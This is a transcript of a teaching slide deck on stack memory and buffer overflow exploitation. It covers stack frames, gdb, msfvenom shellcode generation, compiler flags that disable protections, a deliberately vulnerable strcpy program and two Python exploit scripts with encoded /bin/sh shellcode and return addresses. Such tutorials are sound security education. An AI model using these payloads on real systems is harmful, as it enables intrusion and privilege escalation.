Presentation is loading. Please wait.

Presentation is loading. Please wait.

Basic memory structure & binary exploitation

Published byDerick Barber Modified over 6 years ago

Similar presentations

Presentation on theme: "Basic memory structure & binary exploitation"— Presentation transcript:

1 Basic memory structure & binary exploitation
Buffer overflows

2 Why learn diz stuffz? Gain understanding to how programs really work
For programmers – you can’t prevent what you don’t know/understand Consider yourself lucky if your program only segfaults cause it’s fun  Control the flow of a program causing it to perform actions that were unintended. Privilege escalation (hacking :O) Move to different sections of code bypassing certain methods or checks (cracking :D)

3 Memory layout and purpose
Memory segment concepts

4 Process memory organisation
0x USER TEXT - fixed by the program - contains instructions (code) to be executed - read-only data kernel text and data User text User data Heap Stack Kernel virtual memory known at compile time USER DATA - contains (un)initialised data - static variables (static int x) - corresponds to data-bss section of an executable defined at runtime ↑ ↑ HEAP - Not used for todays example - Larger blocks of memory assigned STACK PROPERTIES - Abstract data type - Last in first out property (LIFO) - contiguous block of memory containing data - Stores local variables - the focus for a basic buffer overflow 0xffffffff

5 Stack control mechanisms
Push – add to the top of the stack Pop – remove from the stack STACK PROPERTIES - Abstract data type - Last in first out property (LIFO) - contiguous block of memory containing data - Stores local variables - the focus for a basic buffer overflow Bottom of Stack (higher memory locations) Stack pointer →

6 Stack control mechanisms - Push mechanism
Push – add to the top of the stack Pop – remove from the stack STACK PROPERTIES - Abstract data type - Last in first out property (LIFO) - contiguous block of memory containing data - Stores local variables - the focus for a basic buffer overflow example Bottom of Stack (higher memory locations) - Push (add) a value to the stack (example) - Increase the stack pointer to represent the new top of the stack New stack pointer →

7 Stack control mechanisms - Pop mechanism
Push – add to the top of the stack Pop – remove from the stack STACK PROPERTIES - Abstract data type - Last in first out property (LIFO) - contiguous block of memory containing data - Stores local variables - the focus for a basic buffer overflow example Bottom of Stack (higher memory locations) - Pop (retrieve) the top value for processing (example) - Decrease the stack pointer to represent the new top of the stack New stack pointer →

8 Alternative explanation to push/pop
Reverse polish mathematics concept 1 + 2 infix notation This is because the operator (+) is both preceded and followed by an operand (1 and 2 respectively) 1 2 + the same equation represented in post-fix notation Start from left to right would be stored as values When an operator is encountered the previous two values would removed, computed, then stored again

9 Example stack - Postfix maths
Control mechanisms Push – add to the top of the stack Pop – remove from the stack STACK PROPERTIES - Abstract data type - Last in first out property (LIFO) - contiguous block of memory containing data - Stores local variables - the focus for a basic buffer overflow New stack pointer → + 2 1 Bottom of Stack (higher memory locations) Lets take “1 2 +” as an example problem So lets push the elements onto the stack

10 Example stack - Postfix maths
Control mechanisms Push – add to the top of the stack Pop – remove from the stack STACK PROPERTIES - Abstract data type - Last in first out property (LIFO) - contiguous block of memory containing data - Stores local variables - the focus for a basic buffer overflow + 2 1 Bottom of Stack (higher memory locations) First lets pop the top value, now we have an operator (+) to play with. Now we need some operands to play with, Lets grab (pop) the next two values on the stack (remember you can only grab the top value off the stack so if this were a computer it must be the next two values) New stack pointer →

11 Example stack - Postfix maths
Control mechanisms Push – add to the top of the stack Pop – remove from the stack STACK PROPERTIES - Abstract data type - Last in first out property (LIFO) - contiguous block of memory containing data - Stores local variables - the focus for a basic buffer overflow 3 Bottom of Stack (higher memory locations) Great, now we have to process (the same as 1 + 2) The result (3) is then pushed onto the stack New stack pointer →

12 Stack key concepts The stack is an abstract data type
Has a last in first out system Stores local variables Contains return memory locations for program flow Each function has it’s own stack frame

13 Stack Frames frames on the stack…. Go figure :P

14 Example stack frame for function(func)
Example code void func(char * arg){ char variable1 [4]; strcpy(variable1, arg); int variable2 = 2; } (func stack frame) variable 1 (string) variable 2 (int) arg EBP Return address (caller location) - EIP Bottom of Stack (higher memory locations) contents junk 2 0x

15 Example stack frame for function(func)
Example code void func(char * arg){ char variable1 [4]; strcpy(variable1, arg); int variable2 = 2; } (func stack frame) variable 1 (string) variable 2 (int) arg EBP Return address (caller location) - EIP Bottom of Stack (higher memory locations) contents AAAA AA-- 0x

16 Uhh… wait what? Example code void func(char * arg){
char variable1 [4]; strcpy(variable1, arg); int variable2 = 2; } (func stack frame) variable 1 (string) variable 2 (int) arg EBP Return address (caller location) - EIP Bottom of Stack (higher memory locations) contents AAAA

17 Oh dear, should’ve done that test data eh?
Example code void func(char * arg){ char variable1 [4]; strcpy(variable1, arg); int variable2 = 2; } (func stack frame) variable 1 (string) variable 2 (int) arg EBP Return address (caller location) - EIP Bottom of Stack (higher memory locations) contents AAAA nAdd New return address to section of code we wish to execute next

18 Return address (caller location) - EIP
The classic nop sled (func stack frame) variable 1 (string) variable 2 (int) arg EBP Return address (caller location) - EIP contents \x90\x90\x90\x90 Hacker Code Here nAdd Nop sled (nop = no operation instruction) Shell code New return address pointing into the nop sled (still only 4 bytes long)

19 Key concepts If input is un-checked (or arrays are copied incorrectly)
This enables us to ‘overflow’ the buffer Programmers should ALWAYS check that one buffer can fit into the other!!! If we can get a segfault, we may be able to redirect the flow of the program we can attempt to inject our own code into the buffer and set the return address into the stack to enable us to execute code with the program’s permissions

20 Intro to Disassembly Obtaining and understanding assembly code derived from an executable

21 Lets start with basic disassembly oh yay, more assembly – ict170 students, chill, it’s just some registers yea?  Key registers EAX, EBX, ECX, EDX, general purpose registers ESP – stack pointer (points to the top of the stack) EBP – base pointer (points to the top of the stack frame) EIP – instruction pointer (location of next instruction) It is worth noting that the return call (ret) is actually a POP EIP instruction, this means that it will POP the address off the top of the stack and place it into EIP This is the part we want to control 

22 Great, now what?! Let’s take a look at gdb (Gnu debugger)
Common commands Break <*instructionLocation> sets a break point at the designated place to stop program flow at that point Info register <register name> can shorten to ‘i r <register>’ c just use i r (info register) to show all register states see what is stored in a register, can be used with the break command x/<format specifier> <memory address> used to examine (x) the information at the location Common format specifiers (e.g. x/100wx $esp-100 – show 100 words starting from (stack pointer – 100) o – octal h – hex u – unsigned base 10 representation s - string T – binary <number>wx – show <number> locations after the given address

23 Crafting an exploit Putting it all together

24 Basic tools/commands we will be using this will all be explained as we go along 
To input large strings fast we can use inline python (or perl but we’re using python ok?!) If the program takes args <program> $(python –c “print ‘stuff to print’”) To generate our payload (use shell not bash) msfvenom –p linux/x86/exec CMD=/bin/sh –f python –b ‘\x00’ this appears to sometimes generate bad shellcode so if things don’t work out when you go to run your payload try re-generating the shellcode. To find program calls for a register msfelfscan –j <register> <program> Plus the gdb stuffz mentioned earlier!

25 Lets try one (or two) together
Putting it all together

26 Recap of what we’ve done
Abused program flow and then privileges to obtain an escalated shell ↓ steps ↓ Overflowed the buffer, received a segfault, and found the number of bytes needed to overwrite the return address Generated shell code using msfvenom Created payload as a python script with padding and shell code (2 options) Nop sled with shell code trailing followed by new EIP (can be handy if you think you might goof the return address, just aim for a region in the stack where you know a nop will be and let the program do the rest) Find the register containing the buffer and direct the jump straight to that (more accurate) Use msfeflscan to find the location of a jump call (to the desired register) already in memory

27 Source code remember to compile with the gcc commands on the next slide!!!
Challenge ideas (clean exit) execute win() Skip x = 0 //used for demonstration #include<stdio.h> #include<string.h> void win(){ printf("\n ZOMG, 1337 h4x! \n"); } void vuln (char * arg){ char buf[256]; strcpy(buf, arg); int main(int argc, char **argv){ printf("\nstring entered: %s\n",argv[1]); vuln(argv[1]); #include<stdio.h> #include<string.h> void vuln (char * arg){ char buf[256]; strcpy(buf, arg); } int main(int argc, char **argv){ int x = 1337; vuln(argv[1]); x = 0; printf(“x=%d”, x);

28 Where to now? Recommended reading VMs (play around!)
Hacking: The Art of Exploitation, 2nd Edition by Jon Erickson The Shellcoder's Handbook: Discovering and Exploiting Security Holes, 2nd Edition by Chris Anley et al VMs (play around!) SmashTheTux v Includes readme files with information on different types of binary exploits Multiple iso’s at different levels Rensselaer Polytechnic Institute (RPISEC): Modern Binary Exploitation (its free!) Course content: Git hub repository: Make your own vulnerable code to exploit to learn and understand the techniques If you compile your own code using gcc, use the following command to disable protections gcc <sourceCode> -o <newFileName> -fno-stack-protector –z execstack if you want to test privilege escalation enable SUID on the compiled program (sudo chmod u+s <program>)

29 Payload.py(nop sled) #generated from msfvenom works on kali 32bit using previously mentioned commands opcode = "“ opcode += "\xdb\xc5\xd9\x74\x24\xf4\x5e\x33\xc9\xb1\x0b\xbf\x88“ opcode += "\x2d\x91\x4b\x31\x7e\x1a\x83\xee\xfc\x03\x7e\x16\xe2“ opcode += "\x7d\x47\x9a\x13\xe4\xca\xfa\xcb\x3b\x88\x8b\xeb\x2b“ opcode += "\x61\xff\x9b\xab\x15\xd0\x39\xc2\x8b\xa7\x5d\x46\xbc“ opcode += "\xb0\xa1\x66\x3c\xee\xc3\x0f\x52\xdf\x70\xa7\xaa\x48“ opcode += "\x24\xbe\x4a\xbb\x4a" # "0xbfcd92c4“ – stack location as return address below returnaddress = "\xc4\x92\xcd\xbf" pad = (264 - len(opcode)) * "\x90“ sploit = pad + opcode + returnaddress print sploit

30 Payload.py(jump to eax)
#generated from msfvenom works on kali 32bit using previously mentioned commands opcode = "“ opcode += "\xdb\xc5\xd9\x74\x24\xf4\x5e\x33\xc9\xb1\x0b\xbf\x88“ opcode += "\x2d\x91\x4b\x31\x7e\x1a\x83\xee\xfc\x03\x7e\x16\xe2“ opcode += "\x7d\x47\x9a\x13\xe4\xca\xfa\xcb\x3b\x88\x8b\xeb\x2b“ opcode += "\x61\xff\x9b\xab\x15\xd0\x39\xc2\x8b\xa7\x5d\x46\xbc“ opcode += "\xb0\xa1\x66\x3c\xee\xc3\x0f\x52\xdf\x70\xa7\xaa\x48“ opcode += "\x24\xbe\x4a\xbb\x4a“ # "0x080483b3“ – location of jump to eax command found with msfelfscan using previously mentioned commands returnaddress = "\xb3\x83\x04\x08" pad = (264 - len(opcode)) * "\x90“ sploit = opcode + pad + returnaddress print sploit

Download ppt "Basic memory structure & binary exploitation"

Similar presentations

Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.

Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.
The art of exploitation

The art of exploitation
Review: Software Security David Brumley Carnegie Mellon University.

Review: Software Security David Brumley Carnegie Mellon University.
Intro to Exploitation Stack Overflows James McFadyen UTD Computer Security Group 10/20/2011.

Intro to Exploitation Stack Overflows James McFadyen UTD Computer Security Group 10/20/2011.
1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.

1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.
Memory Image of Running Programs Executable file on disk, running program in memory, activation record, C-style and Pascal-style parameter passing.

Memory Image of Running Programs Executable file on disk, running program in memory, activation record, C-style and Pascal-style parameter passing.
1 Function Calls Professor Jennifer Rexford COS 217 Reading: Chapter 4 of “Programming From the Ground Up” (available online from the course Web site)

1 Function Calls Professor Jennifer Rexford COS 217 Reading: Chapter 4 of “Programming From the Ground Up” (available online from the course Web site)
1 Homework Reading –PAL, pp 201-216, 297-312 Machine Projects –Finish mp2warmup Questions? –Start mp2 as soon as possible Labs –Continue labs with your.

1 Homework Reading –PAL, pp , Machine Projects –Finish mp2warmup Questions? –Start mp2 as soon as possible Labs –Continue labs with your.
September 22, 2014 Pengju (Jimmy) Jin Section E

September 22, 2014 Pengju (Jimmy) Jin Section E
University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.

University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.

Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.
Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.

Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.
Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer.

Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer.
Introduction: Exploiting Linux. Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend,

Introduction: Exploiting Linux. Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend,
Practical Session 4. Labels Definition - advanced label: (pseudo) instruction operands ; comment valid characters in labels are: letters, numbers, _,

Practical Session 4. Labels Definition - advanced label: (pseudo) instruction operands ; comment valid characters in labels are: letters, numbers, _,
CSCD 303 Essential Computer Security Spring 2013 Lecture 17 Buffer Overflow Attacks.

CSCD 303 Essential Computer Security Spring 2013 Lecture 17 Buffer Overflow Attacks.

Similar presentations

Ads by Google